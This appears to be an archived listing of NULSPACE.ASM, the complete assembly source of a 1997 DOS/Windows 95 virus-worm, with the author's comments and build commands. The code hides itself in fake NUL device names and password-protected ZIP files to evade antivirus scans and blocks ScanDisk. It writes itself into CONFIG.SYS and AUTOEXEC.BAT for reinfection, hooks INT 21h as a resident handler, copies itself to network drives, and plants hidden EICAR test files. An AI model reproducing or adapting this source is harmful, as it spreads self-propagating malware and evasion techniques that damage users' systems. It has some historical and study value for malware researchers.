home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
CCTX0198.ZIP
/
QMUPDAT7.ZIP
/
NULSPACE.ZIP
/
NULSPACE.ASM
next >
Wrap
Assembly Source File
|
1997-07-08
|
13KB
|
289 lines
comment *
This virii/worm hides is NUL-Space and Cypher Text (See my "Playing Hide and
Seek article) Once active this virus can not be detected by normal means.
It hides in a file that has the same name as a NUL device driver. It also
hides in a ZIP file that is password protected so AV programs won't detect it.
It has an unusual payload: it creates those stupid EICAR test files all over
the PC. It is network aware and only spreads by network drives. It works
with Windows 95.
tasm nulspace /m2
tlink nulspace /t
copy nulspace.com c:\winstart.bat
*
.286
qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg
org 00feh
counter label word
org 0100h
start:
com_install proc near ;batch file starting
db "::" ;as a com file it jumps past
js jmp_next_part ;the batch code
jns jmp_next_part
db 0dh,0ah
db "@CTTY NUL",0dh,0ah ;output off and change config
db "ECHO INSTALLHIGH=C:\WINSTART.BAT>>C:\CONFIG.SYS",0dh,0ah
db "IF %Q%==Q GOTO " ;used for reinfection
js $(go_mem_res-jmp_next_part3)
jns $(go_mem_res-jmp_next_part3-02h)
db 0dh,0ah
db ":"
jmp_next_part: jo jmp_next_part1 ;more stupid jumps
jno jmp_next_part1
db 0dh,0ah
db "PKZIP -3 -- -+ -~ -S" ;compress ourselves
password1 db "XXX C:\" ;use password
random_file1 db "QUE." ;random file name
random_ext1 db "CAB C:\WINSTART.BAT",0dh,0ah
db "ECHO @ECHO OFF>>C:\AUTOEXEC.BAT",0dh,0ah
db ":" ;prepare autoexec for reinfect
jmp_next_part1: ja jmp_next_part2 ;more jumps
jb jmp_next_part2
db 0dh,0ah
db "ECHO CTTY NUL>>C:\AUTOEXEC.BAT",0dh,0ah
db "ECHO PKUNZIP -) -3 -O -S"
password2 db "XXX C:\" ;reinfect again
random_file2 db "QUE."
random_ext2 db "CAB>>C:\AUTOEXEC.BAT",0dh,0ah
db ":"
jmp_next_part2: jpe jmp_next_part3 ;more jumps
jpo jmp_next_part3
db 0dh,0ah ;set q=q for jmp in winstart
db "ECHO SET Q=Q>>C:\AUTOEXEC.BAT",0dh,0ah
db "ECHO CTTY CON>>C:\AUTOEXEC.BAT",0dh,0ah
db ":"
jmp_next_part3: js go_mem_res ;more jumps
jns go_mem_res
db 0dh,0ah ;spread it around
db "FOR %%Q IN (%PATH% C:\) DO %COMSPEC% /F/CCOPY/B %0+%0.BAT %%Q",0dh,0ah
db "CTTY CON" ;output on
db 1ah ;ctrl-z
com_install endp
go_mem_res proc near ;clear environment space
mov es,word ptr ds:[2ch]
mov ah,49h
int 21h ;create NUL-Space devices
mov di,offset scandisk_device
mov cx,0003h ;3 of them, first is scandskw
next_device: mov ah,52h ;get list of lists
int 21h
cld
lds si,dword ptr es:[bx+22h];get NUL device chain
push cs
pop es
mov ax,di ;point to new device to add
movsw ;put it in chain
movsw ;far pointer
mov word ptr ds:[si-02h],cs ;point to new device
mov word ptr ds:[si-04h],ax
add di,offset eicar_device-scandisk_device-04h
loop next_device ;do eicar and winstart device
push cs ;hook interrupt 21
pop ds
mov ax,3521h
int 21h
mov word ptr ds:[previous_hook],bx
mov word ptr ds:[previous_hook+02h],es
mov ax,2518h ;save old interrupt 21 as 18
mov dx,bx
push es
pop ds
int 21h
push cs
pop ds
mov dx,offset resident_isr21
mov al,21h
int 21h
mov ah,31h ;go memory resident
mov dx,((tail-com_install+0110h) SHR 4)
int 21h
go_mem_res endp
interrupt_24 proc near
mov al,03h ;fiddly little critical error
iret ;handler
return_far: retf ;retf for NUL device routines
interrupt_24 endp
vname db " NUL-Space "
scandisk_device dd -1 ;our 3 new NUL-Space devices
dw 8004h ;nul character attributes
dw return_far ;do nothing routines
dw return_far
db "SCANDSKW" ;stop scandskw in windows 95
eicar_device dd -1
dw 8004h
dw return_far
dw return_far
eicar_dev_name db "EICAR " ;protect those stupid eicar
winstart_device dd -1 ;files while we infect
dw 8004h
dw return_far
dw return_far
win_dev_name db "WINSTART" ;finally protect ourselves
winstart_file db "C:\WINSTART.BAT",00h ;file name to replicate
eicar_drive db "C:"
eicar_file db "EICAR."
eicar_ext db "QUE",00h
drive_number dw 27
eicar proc near ;stupid EICAR file
pop ax
xor ax,214Fh
push ax
and ax,4140h
push ax
pop bx
xor al,5Ch
push ax
pop dx
pop ax
xor ax,2834h
push ax
pop si
sub [bx],si
inc bx
inc bx
sub [bx],si
jge terminate
eicar_text db 'EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$'
terminate: dec ax
sub cx,[bx+si+2Ah]
db 0dh,0ah
eicar_length label byte
eicar endp
create_random3 proc near
mov cx,0003h ;3 byte random file
setname: xor ax,ax ;random name at ds:si & ds:di
out 43h,al
push cx
in al,40h
mov cx,ax
around: loop around ;psuedo random delay
pop cx
and al,1fh ;32 letters possible
add al,'A'
cmp al,'Z'
jbe nameit
sub al,42 ;if above Z then make it 1-6
nameit: stosb ;save random name
mov byte ptr es:[si],al
inc si
incloop: in al,40h ;get the high byte
loop setname
retn
create_random3 endp
resident_isr21 proc near
pusha
push ds
push es
pushf
push cs
pop ds
cld
inc word ptr ds:[counter] ;only infect every 65536 times
jz infect_now ;into interrupt 21h
jmp not_infect_now
infect_now: mov ax,3524h ;set critical error handler
int 18h
push es
pusha
mov dx,offset interrupt_24 ;our handler
mov ah,25h
int 18h
push cs
pop es ;get drive to infect
next_drive: mov bx,word ptr ds:[drive_number]
cmp bx,27 ;is it past drive Z: ?
jb save_letter
mov bl,02h
save_letter: inc bx ;inc and save for next time
mov word ptr ds:[drive_number],bx
check_next: mov ax,4409h ;see if network or local drive
int 18h
jc next_drive ;if neither get next drive
xchg ax,bx
add al,"@" ;save drive letter
mov byte ptr ds:winstart_file,al
mov byte ptr ds:eicar_drive,al
test dh,10h ;test for network
jz eicar_dropper ;if local then drop EICARs
mov di,offset password1 ;create new cypher text file
mov si,offset password2 ;to be made from winstart
call create_random3
mov di,offset random_file1 ;random file name
mov si,offset random_file2
call create_random3
cmpsb
call create_random3 ;and random extension
mov di,offset eicar_file ;random file name
mov si,offset eicar_dev_name
pusha
call create_random3
popa
cmpsw
call create_random3 ;and more random name
mov dx,offset winstart_file ;create worm
mov di,offset win_dev_name ;disable nul-space driver
mov ah,5bh ;create new file
xor byte ptr ds:[di],ah
xor cx,cx ;normal attributes
int 18h
mov byte ptr ds:[di],"W" ;set nul-space driver back
jc unable_infect
mov dx,0100h ;point to start of winstart
mov cx,offset previous_hook-start
jmp short write_file ;create file
eicar_dropper: mov di,offset eicar_ext ;create EICAR file
mov si,di ;random extension
call create_random3
mov di,offset eicar_dev_name
mov ah,5bh ;create new file
xor byte ptr ds:[di],ah ;disable nul-space driver
mov dx,offset eicar_drive ;point to file
mov cl,07h ;readonly, hidden and system
int 18h
mov byte ptr ds:[di],"E" ;enable nul-space again
mov dl,low(offset eicar) ;point to EICAR file
mov cl,low(offset eicar_length-eicar)
write_file: mov bh,40h ;write EICAR or winstart file
xchg ax,bx
int 18h
mov ax,5701h ;set date
mov dx,229fh
int 18h
mov ah,3eh ;close it
int 18h
unable_infect: popa ;done
pop es
mov dx,bx ;set critical error back
int 18h
not_infect_now: popf
pop_it: pop es
pop_ds_and_all: pop ds
popa
resident_isr21 endp
far_jmp proc near
db 0eah
previous_hook: label double ;previous interrupt 21
far_jmp endp
org $+04h
tail label byte
qseg ends
end start
